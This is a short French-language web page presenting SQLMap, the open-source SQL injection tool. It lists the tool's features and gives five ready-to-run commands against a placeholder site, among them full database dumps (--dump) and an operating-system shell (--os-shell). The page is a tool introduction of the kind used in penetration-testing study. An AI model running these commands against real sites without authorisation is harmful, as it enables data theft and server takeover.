dns

SQLMap

L’outil automatisé de référence pour détecter et exploiter des injections SQL.

Présentation

SQLMap est un outil open-source permettant de détecter, tester et exploiter automatiquement des vulnérabilités d’injection SQL. Il prend en charge de nombreux moteurs de base de données et propose des fonctionnalités puissantes pour exfiltrer des données, obtenir un shell ou même compromettre le serveur.

Fonctionnalités principales

  • check_circle Détection automatique des injections SQL
  • check_circle Support MySQL, MSSQL, Oracle, PostgreSQL, SQLite...
  • check_circle Extraction de données (tables, users, bases)
  • check_circle Dump complet d’une base de données
  • check_circle Prise de contrôle du serveur via shell
  • check_circle Bypass WAF et protections HTTP
  • check_circle Attaques avancées (OS Shell, file upload)

Commandes essentielles

# Scan simple
sqlmap -u "http://site.com/page.php?id=1"

# Dump d'une base
sqlmap -u "http://site.com/page.php?id=1" --dump

# Lister les bases
sqlmap -u "http://site.com/page.php?id=1" --dbs

# Lister les tables
sqlmap -u "http://site.com/page.php?id=1" -D ma_base --tables

# Shell sur le serveur
sqlmap -u "http://site.com/page.php?id=1" --os-shell
    

Documentation officielle

Voir la documentation SQLMap
Loading…
Loading the web debug toolbar…
Attempt #